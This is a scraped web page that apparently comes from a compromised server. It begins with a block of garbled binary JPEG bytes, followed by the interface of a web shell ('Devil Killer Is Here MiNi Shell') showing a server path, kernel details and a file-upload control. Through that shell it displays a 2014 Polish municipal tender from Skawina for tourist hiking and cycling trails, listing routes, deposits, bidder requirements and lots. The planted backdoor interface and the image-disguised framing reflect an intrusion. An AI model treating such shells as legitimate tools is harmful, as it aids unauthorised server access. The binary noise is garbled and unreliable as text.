JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140722/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140722/245424-N-2014.html

<p class="kh_header"><b>Skawina: Budowa Kompleksowego Produktu Turystycznego - Skarby Blisko Krakowa</b><br>
<b>Numer ogłoszenia: 245424 - 2014; data zamieszczenia: 22.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta i Gminy w Skawinie , Rynek 1, 32-050 Skawina, woj. małopolskie, tel. 012 2764680, faks 012 2763339.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.skawina.net</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa Kompleksowego Produktu Turystycznego - Skarby Blisko Krakowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia realizowanego w formule zaprojektuj i wybuduj jest przygotowanie materiałów wyjściowych do projektowania, wykonanie projektów wielobranżowych sieci szlaków pieszo - rowerowych, wraz z punktami informacyjno - wypoczynkowymi, oraz realizacja całego zamierzenia inwestycyjnego.
Planowana inwestycja obejmuje trasy i ogólne zakresy prac: Trasa nr 1: Skawina - Kraków Tyniec: wykonanie tablic informacyjnych,  remont żwirowej nawierzchni utwardzenia gruntu, o pow. ok.  900 m2, wykonanie nowej nawierzchni z kostki betonowej o pow. ok. 60 m2, wykonanie zjazdów dla rowerów, wykonanie modernizacji nawierzchni chodnika o pow. ok. 600 m2, wykonanie barier, wykonanie zjazdów dla rowerów, odtworzenie nawierzchni korony wałów o pow. ok. 5300 m2 Rzepnika - Skawinki, zabezpieczenie wałów przed wjazdem Fuadów, wykonanie punktu wypoczynkowego, wykonanie w obrębie wału oznaczenia geodezyjnego, Trasa nr 2:  Skawina - Wola Radziszowska - Skawina: odtworzenie nawierzchni korony wałów o pow. ok. 7000 m2 , wymiana szlabanów, zabezpieczenie wałów przed wjazdem Fuadów, wykonanie tablic informacyjnych, wykonanie punktów wypoczynkowych, remont żwirowej nawierzchni utwardzenia gruntu o pow. ok. 200 m2, odtworzenie nawierzchni drogi o pow. ok. 5000 m2, miejscowy remont żwirowej nawierzchni utwardzenia gruntu, remont rowu odwadniającego, remont żwirowej nawierzchni utwardzenia gruntu o pow. ok. 900 m2, wykonanie schodów terenowych o konstrukcji drewnianej, wykonanie kładki w konstrukcji drewnianej, wykonanie modernizacji nawierzchni chodnika o pow. ok. 36 m2, Trasa nr 3: Sosnowice Przyśnica - Krzęcin - Jurczyce - Chorzyny: wykonanie tablic informacyjnych, Trasa nr 3A: Facimiech - Wielkie Drogi: wykonanie tablic informacyjnych, Trasa nr 4: Wola Radziszowska Garcowiec - Mogilany Skrzyszów: wykonanie modernizacji nawierzchni chodnika o pow. ok. 1600 m2, odtworzenie nawierzchni drogi o pow. ok. 7700 m2, wykonanie  tablic informacyjnych, Trasa nr 5:  Radziszów Zadworze - ul. Kwiatowa/Jagodowa - Radziszów Centrum: wykonanie tablic informacyjnych, Trasa nr 6: Facimiech - Pozowice - Czernichów: wykonanie tablic informacyjnych, remont żwirowej nawierzchni utwardzenia gruntu o pow. ok. 200 m2, wykonanie punktów wypoczynkowych, Trasa nr 7: Świątniki Górne - Konary - Włosań - Olszowice - Świątniki Górne, odtworzenie nawierzchni drogi o pow. ok. 7300 m2, remont przepustu rurowego, wykonanie punktów wypoczynkowych, realizacja Centrum Informacyjne Szlaków w Świątnikach Górnych, wykonanie tablic informacyjnych, wykonanie miejsca wypoczynkowego w Olszowicach, miejscowy remont żwirowej nawierzchni utwardzenia terenu 900m2, budowa przepustu, Trasa nr 8: Świątniki Górne - Łyczański Las - Podstolice - Ochojno - Świątniki Górne: wykonanie tablic informacyjnych, wykonanie punktu wypoczynkowego w Rzeszotarach, Trasa nr 9: Podstolice: wykonanie tablic informacyjnych
Szczegółowy opis prac zawiera Specyfikacja Istotnych Warunków Zamówienia.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych, w wysokości nie większej niż 50 % wartości przedmiotowego zamówienia, w zakresie objętym zamówieniem podstawowym.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.62-2, 45.23.31.61-5, 45.11.12.00-0, 45.23.24.52-5, 45.11.12.91-4, 71.32.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przed upływem terminu składania ofert, Wykonawca zobowiązany jest do wniesienia wadium w wysokości  50 000,00 zł. W przypadku składania ofert częściowych, wadium wynosi: Część 1 - 30000,00 zł, Część 2  - 2000,00 zł,  Część 3 - 10000,00 zł,  Część 3 - 8000,00 zł,
W przypadku wnoszenia wadium w formie pieniądza wpłaty należy dokonać przelewem na rachunek bankowy Zamawiającego: Urząd Miasta i Gminy Skawina, 32-050 Skawina, Rynek 1: Krakowski Bank Spółdzielczy w Krakowie, Oddział Skawina Nr 36 8591 0007 0020 0560 0013 0005.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku, gdyż nie ma on zastosowania w niniejszym postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony, jeżeli Wykonawca składający ofertę na części zamówienia: nr 1, nr 2 i nr 3 wykaże, że w okresie ostatnich 5 lat, wykonał minimum dwa zamówienia podobne do przedmiotowego zamówienia, tj. nawierzchnie o łącznej powierzchni  minimum 5 000 m2; dla części nr 4 zamówienia - warunek ten nie jest wymagany.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku, gdyż nie ma on zastosowania w niniejszym postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony, jeżeli Wykonawca wykaże dysponowanie: 
minimum jedną osobą posiadającą uprawnienia do kierowania robotami budowlanymi, we wszystkich wymienionych specjalnościach: drogowej, instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych,  
gazowych, wodociągowych i kanalizacyjnych, instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych oraz minimum jedną osobą posiadającą uprawnienia do projektowania, we wszystkich wymienionych w specjalnościach: drogowej, instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych 
i elektroenergetycznych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku, gdyż nie ma on zastosowania w niniejszym postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Wykaz robót budowlanych, polegających na wykonaniu nawierzchni;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony formularz oferty, zgodnie z wzorem załączonym do Specyfikacji,
2. Zaleca się dołączenie do oferty aktualnych dokumentów, z których będzie wynikać uprawnienie do podpisania oferty (np. aktualny statut spółki lub aktualny rejestr handlowy). Wymagane dokumenty można złożyć w formie kopii poświadczonej za zgodność z oryginałem przez wykonawcę.
3. Pełnomocnictwo do podpisania oferty, o ile prawo do podpisania oferty nie wynika z innych dokumentów dołączonych do oferty.
4. Oświadczenie o spełnianiu warunków, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych, zgodnie z wzorem załączonym do Specyfikacji.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany podanego terminu wykonania zamówienia, tylko w przypadku wystąpienia okoliczności nie wynikłych z winy Wykonawcy, w tym m.in.: wystąpienia siły wyższej, wystąpienia warunków atmosferycznych uniemożliwiających realizację robót zgodnie z harmonogramem, wystąpienia konieczności wykonania robót nieprzewidzianych.
Zmiana wynagrodzenia: wynagrodzenie może ulec zmianie jedynie  z tytułu  ustawowej zmiany stawki podatku VAT</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.malopolska.pl/umigskawina<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> UMiG Skawina, Zespół ds. Zamówień Publicznych, Skawina, Rynek 14, pok. 2.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.08.2014 godzina 10:00, miejsce: Urząd Miasta i Gminy Skawina, Biuro Obsługi Mieszkańców, 32-050 Skawina, Rynek 14, pok. 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest współfinansowany przez Unię Europejską w ramach Małopolskiego Regionalnego Programu Operacyjnego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część nr 1. Gmina Skawina.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem Części nr 1 zamówienia realizowanego w formule zaprojektuj i wybuduj  jest przygotowanie materiałów wyjściowych do projektowania, wykonanie projektów wielobranżowego sieci szlaków pieszo - rowerowych, wraz z punktami informacyjno - wypoczynkowymi, oraz realizacja Części nr 1 - Gmina Skawina.
Ta część zamówienia obejmuje trasy:
A/ Trasa nr 1: Skawina - Kraków Tyniec: wykonanie tablic informacyjnych, remont żwirowej nawierzchni utwardzenia gruntu o pow. ok.  900 m2, wykonanie nowej nawierzchni z kostki betonowej o pow. ok. 60 m2, wykonanie zjazdów dla rowerów, wykonanie modernizacji nawierzchni chodnika o pow. ok. 600 m2, wykonanie barier, wykonanie zjazdów dla rowerów, odtworzenie nawierzchni korony wałów Rzepnika - Skawinki  o pow. ok. 5 300 m2, zabezpieczenie wałów przed wjazdem Fuadów, wykonanie punktu wypoczynkowego, wykonanie w obrębie wału oznaczenia geodezyjnego
B/ Trasa nr 2: Skawina - Wola Radziszowska - Skawina: odtworzenie nawierzchni korony wałów o pow. ok. 7 000 m2, wymiana szlabanów, zabezpieczenie wałów przed wjazdem Fuadów, wykonanie tablic informacyjnych, wykonanie punktów wypoczynkowych,  remont żwirowej nawierzchni utwardzenia gruntu o pow. ok. 200 m2, odtworzenie nawierzchni drogi o pow. ok. 5 000 m2, miejscowy remont żwirowej nawierzchni utwardzenia gruntu, remont rowu odwadniającego, remont żwirowej nawierzchni utwardzenia gruntu o pow. ok. 900 m2, wykonanie schodów terenowych o konstrukcji drewnianej, wykonanie kładki w konstrukcji drewnianej, wykonanie modernizacji nawierzchni chodnika o pow. ok. 36 m2 
C/ Trasa nr 3: Sosnowice Przyśnica - Krzęcin - Jurczyce - Chorzyny: wykonanie tablic informacyjnych 
D/ Trasa nr 3A , Facimiech - Wielkie Drogi: wykonanie tablic informacyjnych 
E/ częściowo Trasa nr 4: Wola Radziszowska Garcowiec - Mogilany Skrzyszów, zgodnie z opisem w załączniku 9.4 do SIWZ: wykonanie modernizacji nawierzchni chodnika o pow. ok. 1 600 m2, wykonanie  tablic informacyjnych
F/ Trasa nr 5: Radziszów Zadworze - ul. Kwiatowa/Jagodowa - Radziszów Centrum: wykonanie tablic informacyjnych 
G/ częściowo Trasa nr 6: Facimiech - Pozowice - Czernichów, zgodnie z opisem w załączniku 9.4 do SIWZ: wykonanie tablic informacyjnych, remont żwirowej nawierzchni utwardzenia gruntu o pow. ok. 200 m2, wykonanie punktów wypoczynkowych
Szczegółowy opis prac zawiera SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.62-2, 45.23.31.61-5, 45.11.12.00-0, 45.23.24.52-5, 45.11.12.91-4, 71.32.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część nr 2. Gmina Czernichów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem Części nr 2 zamówienia realizowanego w formule zaprojektuj i wybuduj  jest przygotowanie materiałów wyjściowych do projektowania, wykonanie projektów wielobranżowego sieci szlaków pieszo - rowerowych, wraz z punktami informacyjno - wypoczynkowymi, oraz realizacja Części nr 2 - Gmina Czernichów.
Ta część zamówienia obejmuje częściowo Trasę nr 6: Facimiech - Pozowice - Czernichów, zgodnie z opisem w załączniku 9.4 do SIWZ: wykonanie punktów wypoczynkowych
Szczegółowy opis prac zawiera SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.62-2, 45.23.31.61-5, 45.11.12.00-0, 45.23.24.52-5, 45.11.12.91-4, 71.32.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część nr 3. Gmina Mogilany.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem Części nr 3 zamówienia realizowanego w formule zaprojektuj i wybuduj  jest przygotowanie materiałów wyjściowych do projektowania, wykonanie projektów wielobranżowego sieci szlaków pieszo - rowerowych, wraz z punktami informacyjno - wypoczynkowymi, oraz realizacja Części nr 3 - Gmina Mogilany.
Ta część zamówienia obejmuje:
A/ częściowo Trasa nr 4: Wola Radziszowska Garcowiec - Mogilany Skrzyszów, zgodnie z opisem w załączniku 9.4 do SIWZ: odtworzenie nawierzchni drogi o pow. ok. 7 700 m2, wykonanie  tablic informacyjnych, wykonanie punktów wypoczynkowych
B/ częściowo Trasa nr 7: Świątniki Górne - Konary - Włosań - Olszowice - Świątniki Górne, zgodnie z opisem w załączniku 9.4 do SIWZ: odtworzenie nawierzchni drogi o pow. ok. 7 300 m2 , remont przepustu rurowego, wykonanie punktów wypoczynkowych, wykonanie tablic informacyjnych, miejscowy remont żwirowej nawierzchni utwardzenia terenu 900 m2, budowa przepustu 
Szczegółowy opis prac zawiera SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.62-2, 45.23.31.61-5, 45.11.12.00-0, 45.23.24.52-5, 45.11.12.91-4, 71.32.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część nr 4. Gmina Świątniki Górne.</p>
